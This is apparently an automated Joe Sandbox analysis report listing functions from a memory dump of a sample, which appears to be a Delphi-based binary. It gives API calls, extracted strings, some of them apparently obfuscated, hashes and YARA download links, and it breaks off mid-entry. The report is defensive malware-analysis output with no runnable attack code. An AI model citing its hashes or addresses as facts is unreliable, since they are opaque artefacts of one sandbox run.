                                                                  • Opcode Fuzzy Hash: 07bb9862341e01356d0dff1c427b7db7969236951c1baf01262c24fa338bcbd1
                                                                  • Instruction Fuzzy Hash: 6C417B71A00219AFCF219F94DD85AEF7FB9EB08711F104536FA01E6290C3399E508BE9
                                                                  Function 00601AA8 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0060B5C4,00000000,00601B9C), ref: 00601AD7
                                                                  • LocalFree.KERNEL32(?,00000000,00601B9C), ref: 00601AE9
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00601B9C), ref: 00601B0D
                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,?,00000000,00601B9C), ref: 00601B5E
                                                                  • LeaveCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B8C
                                                                  • DeleteCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B96
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID:
                                                                  • API String ID: 3782394904-0
                                                                  • Opcode ID: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction ID: c74aeac536d04daf1d9aaa2b88ae39994b19cafb1f7c4f4c32481e89d1555f1e
                                                                  • Opcode Fuzzy Hash: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction Fuzzy Hash: 51213B74AC4244AFD75EEFA8DC56B5BBBE6EB0A300F10A499F5009B3E1D7345940DB14
                                                                  Function 00604C91 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602ED9
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602EE5
                                                                  • GetCommandLineA.KERNEL32 ref: 00604CF7
                                                                  • GetVersion.KERNEL32 ref: 00604D0B
                                                                  • GetVersion.KERNEL32 ref: 00604D1C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00604D58
                                                                    • Part of subcall function 00602F04: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                    • Part of subcall function 00602F04: RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                    • Part of subcall function 00602F04: RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  • GetThreadLocale.KERNEL32 ref: 00604D38
                                                                    • Part of subcall function 00604BC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3734044017-0
                                                                  • Opcode ID: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction ID: feb53608f4c1b4819b7fdf81e77006572a780a3a92dd732f2b90cdc25788172e
                                                                  • Opcode Fuzzy Hash: 5427cc31308d50f8f58cb81c4086aa616b8e4a906fae4bce7af71f1dfe7d5ce2
                                                                  • Instruction Fuzzy Hash: 600125F44C4341C5E76DBF60AC8674B3A639F13344F14B85DE2514A3E2EF754184976A
                                                                  Function 00602F04 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: c522d6b20feab569b95bd321231a7b39662f5e31493b4586a0d9637fe5901882
                                                                  • Instruction ID: c03fda469428753ecf02ecefcce68b4b7182e76c56f88a0b924b5aea7086ba02
                                                                  • Opcode Fuzzy Hash: c522d6b20feab569b95bd321231a7b39662f5e31493b4586a0d9637fe5901882
                                                                  • Instruction Fuzzy Hash: 3601B5755C030AB9DB15DBE0CC56BFB77BDDB09744F5000A5BA04D65C0E6705A14D798
                                                                  Function 0040203F Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStartupInfoA.KERNEL32 ref: 0040209D
                                                                  • GetFileType.KERNEL32 ref: 00402148
                                                                  • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004021AB
                                                                  • GetFileType.KERNEL32 ref: 004021B9
                                                                  • SetHandleCount.KERNEL32 ref: 004021F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                  • String ID:
                                                                  • API String ID: 1710529072-0
                                                                  • Opcode ID: 400b9e1c09f4c8b4246377677c855733b0a7004988ecaecd724ee2ff353f4308
                                                                  • Instruction ID: caac54b683a96beeea0f3893d81dbd00cf7c5e2421639fb466baf6c3d4da63b4
                                                                  • Opcode Fuzzy Hash: 400b9e1c09f4c8b4246377677c855733b0a7004988ecaecd724ee2ff353f4308
                                                                  • Instruction Fuzzy Hash: 7F5128315003028BD7108B28DE4C72A7BE1EB15324F25467ED656BF3E1DBB88806CB59
                                                                  Function 00606D64 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606DFB,?,?,00000000), ref: 00606D7C
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00606DFB,?,?,00000000), ref: 00606DAC
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CB0,00000000,00000000,00000004), ref: 00606DB7
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00606DFB,?,?,00000000), ref: 00606DD5
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CEC,00000000,00000000,00000003), ref: 00606DE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction ID: 351a49cc6eeb8d263ff2a59df9ed8983b84ceb925ca044530df0050181d320a2
                                                                  • Opcode Fuzzy Hash: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction Fuzzy Hash: 940126757C42486BE319FBB0CC13B5B765FEF85720F510564F600E66C2EA659E1082A9
                                                                  Function 00402262 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402264
                                                                  • TlsGetValue.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402272
                                                                  • SetLastError.KERNEL32(00000000,?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 004022BE
                                                                    • Part of subcall function 004030C5: HeapAlloc.KERNEL32(00000008,?,?,?,?,0040221A,00000001,00000074,?,00401836), ref: 0040311A
                                                                  • TlsSetValue.KERNEL32(00000000,?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 00402296
                                                                  • GetCurrentThreadId.KERNEL32(?,00000000,00401A42,00000000,?,?,?,004018C0,?,?,00000000,00000000), ref: 004022A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                  • String ID:
                                                                  • API String ID: 2020098873-0
                                                                  • Opcode ID: 335a875935f7b19f5e8a0b5442704e984695624e2c3f9a47eb943db27249e189
                                                                  • Instruction ID: f9de0d5041fc25c08b20143062fd2b82a10856d808b46f2208d999d265b65f83
                                                                  • Opcode Fuzzy Hash: 335a875935f7b19f5e8a0b5442704e984695624e2c3f9a47eb943db27249e189
                                                                  • Instruction Fuzzy Hash: 0BF0BB32601A115BD7312F71BF0DA5F3A54EF01B71715027EF945BA2E0DB7988014AE8
                                                                  Function 00606E14 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606FDE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00606E43
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction ID: 549bb3956218e062135398211ae85f01a1fb8ae2f528c7acbdc3c2fb8c59784f
                                                                  • Opcode Fuzzy Hash: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction Fuzzy Hash: 254103357C82164BD71DAB78C8816BFF7ABDB84300B604569F442D33C6DA70EE16C669
                                                                  Function 00606B8C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,00606C9F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00606BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LocaleThread
                                                                  • String ID: DR`$|R`$Q`
                                                                  • API String ID: 635194068-1853681101
                                                                  • Opcode ID: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction ID: 239d570031dca18a3b836607bbb55e997dcfd0203a85c96b2fac2a33e89f6fe5
                                                                  • Opcode Fuzzy Hash: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction Fuzzy Hash: B131B471F801085BD708DA95C891BAF77AFDB88310F11447AFA09D73C1DA35ED1187A9
                                                                  Function 00608DD8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00608E0A
                                                                    • Part of subcall function 00608D40: lstrcmpA.KERNEL32(?,?), ref: 00608D95
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoadlstrcmp
                                                                  • String ID: Hfqmfo01$LvwsvwGfavdPwqjmdB$that made me looool
                                                                  • API String ID: 2493137890-1512227557
                                                                  • Opcode ID: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction ID: 91cfcea0a7c87a67f9c2548e482a2e6c48ff6f34df040ee4925186b5e68baebf
                                                                  • Opcode Fuzzy Hash: ac9e2763bc583bae6a6ae1e0cdd70218bde24cb25572d77f1616a3f6bdbf989c
                                                                  • Instruction Fuzzy Hash: BEF081307807146FE348EBA4CC12B5F7AAEDB85740F510478F580977C2DE749E008668
                                                                  Function 00608288 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00608799,00000000,006087AC), ref: 0060828E
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,00608799,00000000,006087AC), ref: 0060829F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction ID: 5e6b4c9483f2f7c51195c5a922daefa23dd3e15a114a57c8b2c2df2eadd9ead3
                                                                  • Opcode Fuzzy Hash: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction Fuzzy Hash: 41D09EB06C1F469EF718EBE15C85613359F9740349F40A429B143472D1EEA589445FE5
                                                                  Function 006087BC Relevance: 6.4, Strings: 5, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Cv1b65s4fhs5g$LEK$LEN$LET$LeN2
                                                                  • API String ID: 0-540611677
                                                                  • Opcode ID: ebd5129da31cb8bec77683622b2556c110d4d57b298ed4dd0b3c90598997d42e
                                                                  • Instruction ID: 303b0df73370c22c81846fce0fc5bee04f2d4bd8b943fa37c21e1f5f327a566b
                                                                  • Opcode Fuzzy Hash: ebd5129da31cb8bec77683622b2556c110d4d57b298ed4dd0b3c90598997d42e
                                                                  • Instruction Fuzzy Hash: A3517430A841495FDF89EBA4C8429DFB7B7EF55300F5040A9E481A73D2DE749E06CB59
                                                                  Function 006087F8 Relevance: 6.4, Strings: 5, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: Cv1b65s4fhs5g$LEK$LEN$LET$LeN2
                                                                  • API String ID: 1029625771-540611677
                                                                  • Opcode ID: dc3abd6f085aa029bf8dc6caa9084fddafc0af94d937e161695d8a450c00fc25
                                                                  • Instruction ID: fbcd3e01223230a3ddce9288ca9acb4f485afac74d0806ade84b1f33029c4d3b
                                                                  • Opcode Fuzzy Hash: dc3abd6f085aa029bf8dc6caa9084fddafc0af94d937e161695d8a450c00fc25
                                                                  • Instruction Fuzzy Hash: 6A412130A805095FDF88FB94C882ADFB7B7EF44300F504569E481A73D2DE74AE468B59
                                                                  Function 00607D6C Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStringTypeExA.KERNEL32(?,00000002,?,00000080,?), ref: 00607E66
                                                                  • GetThreadLocale.KERNEL32 ref: 00607D96
                                                                    • Part of subcall function 00607CF4: GetCPInfo.KERNEL32(00000000,?), ref: 00607D0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocaleStringThreadType
                                                                  • String ID:
                                                                  • API String ID: 1505017576-0
                                                                  • Opcode ID: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction ID: 031fbc90ea44a9d57a695ee475c96b9f8855e0aa644ccf8bf3c3245cd95ddff9
                                                                  • Opcode Fuzzy Hash: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction Fuzzy Hash: 84312621EC93858BD764DB64EC017A73FA7EB91305F04A0D9E9448B3D2EB346C49C766
                                                                  Function 004017C6 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 004017EC
                                                                    • Part of subcall function 004022C9: HeapCreate.KERNELBASE(00000000,00001000,00000000,00401824,00000001), ref: 004022DA
                                                                    • Part of subcall function 004022C9: HeapDestroy.KERNEL32 ref: 004022F8
                                                                  • GetCommandLineA.KERNEL32 ref: 0040184C
                                                                  • GetStartupInfoA.KERNEL32 ref: 00401877
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040189A
                                                                    • Part of subcall function 004018F3: ExitProcess.KERNEL32 ref: 00401910
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                  • String ID:
                                                                  • API String ID: 2057626494-0
                                                                  • Opcode ID: 580e609f3b58203afaf02fb415f8282007d0353eaa0aedd914cb555909b1db8c
                                                                  • Instruction ID: 7f32cd8fe34967029b0e80cb92399a2b70a2c6a079cbf2585e16a7e0bb248895
                                                                  • Opcode Fuzzy Hash: 580e609f3b58203afaf02fb415f8282007d0353eaa0aedd914cb555909b1db8c
                                                                  • Instruction Fuzzy Hash: 3E2160B19407059BDB08BBA5DD4AA6E7BA8FF04714F10403FF905BA2E1DB788940CB58
                                                                  Function 00402998 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 004029AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Info
                                                                  • String ID: $
                                                                  • API String ID: 1807457897-3032137957
                                                                  • Opcode ID: eee52de4ef1d4b68b42ec2e047e9f4f22a41eb0dfe49c41ee4b0386842691e7c
                                                                  • Instruction ID: 926cd45f255bbb82106f54f5591ecb558f37e935955913c86844fdd4412d6bab
                                                                  • Opcode Fuzzy Hash: eee52de4ef1d4b68b42ec2e047e9f4f22a41eb0dfe49c41ee4b0386842691e7c
                                                                  • Instruction Fuzzy Hash: 88415A312042585AFB219B14DF4DBFB3FA9EB01704F1500F6D586F61D2C6B94A54CBAA
                                                                  Function 006076BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0060787F), ref: 00607729
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0060787F), ref: 0060774B
                                                                    • Part of subcall function 00604B70: LoadStringA.USER32 ref: 00604BA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                                                  • String ID: |Q`
                                                                  • API String ID: 902310565-1287144811
                                                                  • Opcode ID: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction ID: 29300fce4ad5f21c6a0c8294c9238be0950d320ce33057e9c1de983e8ff0d5f7
                                                                  • Opcode Fuzzy Hash: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction Fuzzy Hash: CE51D270A44658DFDB65DB68CD85BCAB7FAAB48300F4041E9E508AB391E770AE84CF51
                                                                  Function 00604F9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
